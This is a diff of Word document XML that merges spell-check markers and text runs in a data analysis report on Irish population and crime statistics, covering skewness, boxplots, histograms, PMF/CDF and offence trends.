-          <w:lang w:eastAsia="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>Moderately skewed: Between -1 and -0.5 or between 0.5 and 1</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="HTMLPreformatted"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>Approximately symmetrical: Between -0.5 and 0.5</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="HTMLPreformatted"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
@@ -7376,41 +7136,13 @@
         </w:rPr>
         <w:t xml:space="preserve">or </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>distplots</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> can be used to visualize skewness. However, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>distplots</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> are generally considered to be a better option because they provide more information about the shape of the data distribution.</w:t>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>distplots can be used to visualize skewness. However, distplots are generally considered to be a better option because they provide more information about the shape of the data distribution.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7498,7 +7230,6 @@
         </w:rPr>
         <w:t xml:space="preserve">Figure 01: </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -7507,9 +7238,8 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>distplot</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t xml:space="preserve">distplot </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -7518,9 +7248,8 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
+        <w:t>-</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -7529,7 +7258,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>-</w:t>
+        <w:t xml:space="preserve">  </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -7539,28 +7268,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">  </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i/>
-          <w:iCs/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>Skewness</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i/>
-          <w:iCs/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve">Skewness </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -7756,7 +7464,6 @@
           <w:lang w:eastAsia="en-IE"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -7768,7 +7475,6 @@
         </w:rPr>
         <w:t>BoxPlot</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -7925,19 +7631,8 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="en-IE"/>
         </w:rPr>
-        <w:t xml:space="preserve">dentify </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-        <w:t>outliers</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>dentify outliers</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -8077,9 +7772,8 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">: </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
+        <w:t xml:space="preserve">: Boxplot  </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -8088,28 +7782,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Boxplot  </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i/>
-          <w:iCs/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>-</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i/>
-          <w:iCs/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> population by region</w:t>
+        <w:t>- population by region</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8197,15 +7870,7 @@
         <w:jc w:val="both"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Outliers are data points that significantly differ from </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>the majority of</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> observations in a dataset. They can be caused by various factors, including measurement errors, data entry errors, or natural variation in the population.</w:t>
+        <w:t>Outliers are data points that significantly differ from the majority of observations in a dataset. They can be caused by various factors, including measurement errors, data entry errors, or natural variation in the population.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8765,27 +8430,7 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="en-IE"/>
         </w:rPr>
-        <w:t xml:space="preserve">Pie charts use a 1D array as input, so we need to convert the data variable to a 1D array using the NumPy </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-        <w:t>ravel(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-        <w:t>) function.</w:t>
+        <w:t>Pie charts use a 1D array as input, so we need to convert the data variable to a 1D array using the NumPy ravel() function.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9145,27 +8790,7 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="en-IE"/>
         </w:rPr>
-        <w:t xml:space="preserve">the population of Ireland is becoming more concentrated in the Dublin region. This may be due to </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-        <w:t>a number of</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> factors, such as job opportunities, educational opportunities, and cultural amenities.</w:t>
+        <w:t>the population of Ireland is becoming more concentrated in the Dublin region. This may be due to a number of factors, such as job opportunities, educational opportunities, and cultural amenities.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9628,15 +9253,7 @@
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">are theft and related offenses, public order and other social code offenses, and damage to property and the environment. Conversely, </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>kidnapping</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> and related offenses are the least common type of offense.</w:t>
+        <w:t>are theft and related offenses, public order and other social code offenses, and damage to property and the environment. Conversely, kidnapping and related offenses are the least common type of offense.</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -9714,15 +9331,7 @@
         <w:jc w:val="both"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Statistical techniques were employed in this project within the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Jupyter</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> notebook named </w:t>
+        <w:t xml:space="preserve">Statistical techniques were employed in this project within the Jupyter notebook named </w:t>
       </w:r>
       <w:r>
         <w:t>“</w:t>
@@ -9841,28 +9450,16 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
+        <w:t xml:space="preserve"> deviation</w:t>
+      </w:r>
+      <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>deviation</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
       <w:r>
         <w:t>:</w:t>
       </w:r>
       <w:r>
-        <w:t>to</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> measure the spread of the data.</w:t>
+        <w:t>to measure the spread of the data.</w:t>
       </w:r>
       <w:r>
         <w:br/>
@@ -9873,29 +9470,8 @@
         <w:pStyle w:val="NormalWeb"/>
         <w:jc w:val="both"/>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Applyiing</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>the .describe</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">() method on </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>crime_df</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>:</w:t>
+      <w:r>
+        <w:t>Applyiing the .describe() method on crime_df:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10320,7 +9896,6 @@
         </w:rPr>
         <w:t xml:space="preserve">Histograms provide a visual representation of the distribution of </w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -10337,17 +9912,7 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="en-IE"/>
         </w:rPr>
-        <w:t>,</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve">, </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -10528,14 +10093,52 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
-        <w:t xml:space="preserve"> – histogram of </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i/>
-          <w:iCs/>
+        <w:t xml:space="preserve"> – histogram of crime_df</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Insights:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+        <w:spacing w:line="288" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:color w:val="auto"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
@@ -10547,51 +10150,8 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
-        <w:t>crime_df</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>Insights:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyA"/>
-        <w:spacing w:line="288" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:color w:val="auto"/>
@@ -10605,8 +10165,14 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
-      </w:pPr>
-      <w:r>
+        <w:t>The distribution of the VALUE column is skewed to the right. This means that there are more values on the right side of the distribution than on the left side.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+        <w:spacing w:line="288" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:color w:val="auto"/>
@@ -10620,14 +10186,8 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
-        <w:t>The distribution of the VALUE column is skewed to the right. This means that there are more values on the right side of the distribution than on the left side.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyA"/>
-        <w:spacing w:line="288" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:color w:val="auto"/>
@@ -10641,8 +10201,14 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
-      </w:pPr>
-      <w:r>
+        <w:t>The median value of the VALUE column is between 10,000 and 15,000.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+        <w:spacing w:line="288" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:color w:val="auto"/>
@@ -10656,27 +10222,6 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
-        <w:t>The median value of the VALUE column is between 10,000 and 15,000.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyA"/>
-        <w:spacing w:line="288" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="auto"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
-          <w:lang w:val="en-IE" w:eastAsia="en-IE"/>
-          <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
-            <w14:noFill/>
-            <w14:prstDash w14:val="solid"/>
-            <w14:bevel/>
-          </w14:textOutline>
-        </w:rPr>
       </w:pPr>
     </w:p>
     <w:p>
@@ -10708,21 +10253,8 @@
         <w:pStyle w:val="NormalWeb"/>
         <w:jc w:val="both"/>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Pmf</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> and </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Cdf</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> are classes that represent probability mass functions (PMFs) and cumulative distribution functions (CDFs), respectively.</w:t>
+      <w:r>
+        <w:t>Pmf and Cdf are classes that represent probability mass functions (PMFs) and cumulative distribution functions (CDFs), respectively.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10932,21 +10464,8 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="en-IE"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i/>
-          <w:iCs/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-        <w:t>pmi</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t xml:space="preserve"> pmi</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -11204,19 +10723,8 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="en-IE"/>
         </w:rPr>
-        <w:t xml:space="preserve">ublic order and other social code </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-        <w:t>offences</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>ublic order and other social code offences</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -11406,17 +10914,8 @@
           <w:i/>
           <w:iCs/>
         </w:rPr>
-        <w:t xml:space="preserve">CDF of </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-        </w:rPr>
-        <w:t>crime_df</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>CDF of crime_df</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -11457,25 +10956,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">The CDF chart shows that the VALUE column is skewed to the right. This means that there is a relatively small number of crimes with very high values, and </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>a large number of</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> crimes with lower values.</w:t>
+        <w:t>The CDF chart shows that the VALUE column is skewed to the right. This means that there is a relatively small number of crimes with very high values, and a large number of crimes with lower values.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11737,15 +11218,7 @@
         <w:jc w:val="both"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">The chart shows that all five types of offences have increased over time. Theft and related offences </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>has</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> shown the smallest increase, followed by public order and other social code offences. The other three types of offence have all shown larger increases. After 2021, all 5 types of offences started to increase, with theft and related offences leading the increase.</w:t>
+        <w:t>The chart shows that all five types of offences have increased over time. Theft and related offences has shown the smallest increase, followed by public order and other social code offences. The other three types of offence have all shown larger increases. After 2021, all 5 types of offences started to increase, with theft and related offences leading the increase.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11808,41 +11281,7 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
-        <w:t xml:space="preserve">To compare population growth and crime rates, we will filter the population </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="auto"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
-          <w:lang w:val="en-IE" w:eastAsia="en-IE"/>
-          <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
-            <w14:noFill/>
-            <w14:prstDash w14:val="solid"/>
-            <w14:bevel/>
-          </w14:textOutline>
-        </w:rPr>
-        <w:t>dataframe</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="auto"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
